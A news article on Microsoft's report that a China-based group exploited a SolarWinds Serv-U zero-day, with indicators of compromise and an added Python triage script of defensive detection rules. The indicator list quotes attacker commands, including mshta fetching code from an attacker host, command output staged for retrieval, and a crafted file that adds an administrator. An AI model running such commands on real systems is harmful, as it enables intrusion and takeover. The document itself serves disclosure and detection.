Microsoft said on Tuesday that hackers operating in China exploited a zero-day vulnerability in SolarWinds products. According to Microsoft, the hackers were most likely targeting software companies and the U.S. defense industry.
SolarWinds disclosed the zero-day on Monday, after receiving a notification from Microsoft that a previously unknown vulnerability in the SolarWinds Serv-U product line was being actively exploited. Austin, Texas-based SolarWinds did not provide details on the threat actor behind the attack or on how the attack succeeded.
Commercial VPNs and compromised consumer routers
On Tuesday, Microsoft said it has designated the group of hackers, for now, as “DEV-0322.” “DEV” refers to a “development group” that is still under study before Microsoft researchers have high confidence about the origin or identity of the actor behind the operation. The company says the attackers are physically located in China and often rely on botnets made up of routers or other types of IoT devices.
“MSTIC has observed DEV-0322 targeting entities in the U.S. Defense Industrial Base Sector and software companies,” researchers with the Microsoft Threat Intelligence Center wrote in a post. “This activity group is based in China and has been observed using commercial VPN solutions and compromised consumer routers in their attacker infrastructure.”
In addition to the three servers affiliated with the attacker that SolarWinds has already revealed, Microsoft provides three additional clues that people can use to determine if they have been hacked. The indicators of compromise are:
- hxxp://144[.]34[.]179[.]162/a
- C:\Windows\Temp\Serv-U.bat
- C:\Windows\Temp\test\current.dmp
- The presence of suspicious exception errors, especially in the DebugSocketlog.txt log file
- C:\Windows\System32\mshta.exe http://144[.]34[.]179[.]162/a (defanged)
- cmd.exe /c whoami > "./Client/Common/redacted.txt"
- cmd.exe /c dir > ".\Client\Common\redacted.txt"
- cmd.exe /c "C:\Windows\Temp\Serv-U.bat"
- powershell.exe C:\Windows\Temp\Serv-U.bat
- cmd.exe /c type \\redacted\redacted.Archive > "C:\ProgramData\RhinoSoft\Serv-U\Users\Global Users\redacted.Archive"
Tuesday’s post also provided new technical details about the attack. In particular:
We observed DEV-0322 piping the output of their cmd.exe command into a file in the Serv-U Client\Common folder, which is accessible from the internet by default, so that the attacker can retrieve the results of the command. The actors were also observed adding new global users to Serv-U, effectively adding themselves as Serv-U administrators, by manually creating crafted .Archive files in the Global Users directory. Serv-U user information is stored in these .Archive files.
Due to the way DEV-0322 had written their code, when the exploit successfully compromises the Serv-U process, an exception is generated and logged to the Serv-U log file, DebugSocketLog.txt. The process may also crash after a malicious command is run.
By studying telemetry, we identified the characteristics of the exploitation, but not the underlying vulnerability. MSTIC worked with Microsoft’s Offensive Security Research team, which conducted vulnerability research on the Serv-U binaries and discovered the vulnerability through black-box analysis. Once the root cause was found, we reported the vulnerability to SolarWinds, who responded quickly to understand the issue and build a patch.
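The indicator list above and Microsoft's description of the tradecraft (command output redirected into the internet-reachable Client\Common folder, a crafted .Archive dropped into Global Users, exceptions logged to DebugSocketLog.txt) translate directly into host-side triage checks. The following Python is an added example written for this article, not code from Microsoft or SolarWinds; the log line format, file listings and command lines it runs over are constructed sample data, and the rule names and function names are this example's own choices.

```python
"""Triage helpers for the Serv-U indicators quoted in the article.

Added example, not Microsoft's or SolarWinds' code. All inputs below are
constructed; a real run would read process-creation telemetry, the Serv-U
DebugSocketLog.txt and a listing of the Global Users directory.
"""
import re
from pathlib import PureWindowsPath

# Indicators quoted on the page. The URL/IP is published defanged.
IOC_HOST = "144.34.179.162"
IOC_PATHS = {
    PureWindowsPath(r"C:\Windows\Temp\Serv-U.bat"),
    PureWindowsPath(r"C:\Windows\Temp\test\current.dmp"),
}

# Command-line shapes from the indicator list: output redirected into the
# web-reachable Client\Common folder, the dropped .bat being launched,
# mshta pulling remote content, and a crafted .Archive written to Global Users.
CMDLINE_RULES = [
    ("output redirected into Client\\Common",
     re.compile(r"cmd\.exe\s+/c\s+\w+.*>\s*\"?\.?[\\/]?Client[\\/]Common[\\/]", re.I)),
    ("Serv-U.bat executed from Windows\\Temp",
     re.compile(r"(cmd|powershell)\.exe.*Windows\\Temp\\Serv-U\.bat", re.I)),
    ("mshta fetching remote content",
     re.compile(r"mshta\.exe\s+https?://", re.I)),
    (".Archive written to Global Users",
     re.compile(r"\.Archive\s*>.*Global Users\\.*\.Archive", re.I)),
]


def refang(indicator):
    """Turn the published '144[.]34[.]179[.]162' / 'hxxp://' form back into a matchable one."""
    return indicator.replace("[.]", ".").replace("hxxp", "http")


def classify_command_line(cmdline):
    """Return the names of every rule a process command line matches, in rule order."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(cmdline)]
    if IOC_HOST in refang(cmdline):
        hits.append("known C2 host in command line")
    return hits


def ioc_paths_present(existing_files):
    """Dropped-file indicators found in a file listing (Windows paths compare case-insensitively)."""
    found = {PureWindowsPath(p) for p in existing_files}
    return sorted(str(p) for p in IOC_PATHS if p in found)


def count_log_exceptions(log_text):
    """Count DebugSocketLog.txt lines that mention an exception (line format assumed)."""
    return sum(1 for line in log_text.splitlines()
               if re.search(r"\bexception\b", line, re.I))


def unexpected_archives(global_users_listing, expected_admins):
    """.Archive files in Global Users whose name is not a known administrator account."""
    expected = {a.lower() for a in expected_admins}
    return sorted(name for name in global_users_listing
                  if name.lower().endswith(".archive")
                  and name[:-len(".Archive")].lower() not in expected)


# Constructed sample telemetry for a stand-alone run.
SAMPLE_CMDLINES = [
    'cmd.exe /c whoami > "./Client/Common/redacted.txt"',
    "mshta.exe http://144[.]34[.]179[.]162/a",
    r"cmd.exe /c dir C:\Users",                        # benign: no rule should fire
]
SAMPLE_FILES = [r"c:\windows\temp\serv-u.bat", r"C:\Program Files\Serv-U\Serv-U.exe"]
SAMPLE_DEBUG_LOG = """\
2021-07-13 10:02:11 - Session 4: SSH key exchange started
2021-07-13 10:02:12 - Exception 0xC0000005 in SSH handler thread
2021-07-13 10:02:12 - Session 4: connection closed
2021-07-13 10:03:40 - Unhandled exception while processing packet
"""
SAMPLE_GLOBAL_USERS = ["admin.Archive", "sysop.Archive", "readme.txt"]


def triage(cmdlines, files, debug_log, global_users, expected_admins):
    """Bundle every check into one report dict so the results can be asserted or printed."""
    return {
        "command_line_hits": {c: h for c in cmdlines if (h := classify_command_line(c))},
        "ioc_paths": ioc_paths_present(files),
        "log_exceptions": count_log_exceptions(debug_log),
        "unexpected_archives": unexpected_archives(global_users, expected_admins),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE_CMDLINES, SAMPLE_FILES, SAMPLE_DEBUG_LOG,
                             SAMPLE_GLOBAL_USERS, ["admin"]).items():
        print(f"{key}: {value}")
```

The `.Archive` check is the one that needs local knowledge: Serv-U legitimately keeps its user definitions in that directory, so the signal is an account nobody on the admin team created, not the presence of .Archive files as such. The exception count likewise only means something against a baseline for that server's normal DebugSocketLog.txt volume.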
The zero-day vulnerability, tracked as CVE-2021-35211, is in SolarWinds’ Serv-U product, which customers use to transfer files over the network. When Serv-U’s SSH service is exposed to the Internet, the exploit gives an attacker the ability to run malicious code remotely with high system privileges. From there, attackers can install and run malicious payloads, or they can view and modify data.
SolarWinds became a household name late last December when researchers discovered that it was at the center of a supply chain attack with global reach. After compromising SolarWinds’ software build system, the attackers used their access to push malicious updates to about 18,000 customers of the company’s Orion network management tool.
Of those 18,000 customers, about nine U.S. government agencies and about 100 private-industry organizations received follow-on attacks. The federal government has linked the attack to Russia’s Foreign Intelligence Service, abbreviated as SVR. For more than a decade, the SVR has run malware campaigns targeting governments, political think tanks, and other organizations around the world.
The zero-day attacks found and reported by Microsoft were not related to the Orion supply chain attack.
SolarWinds addressed the vulnerability over the weekend. Anyone running a vulnerable version of Serv-U should immediately update and check for signs of compromise.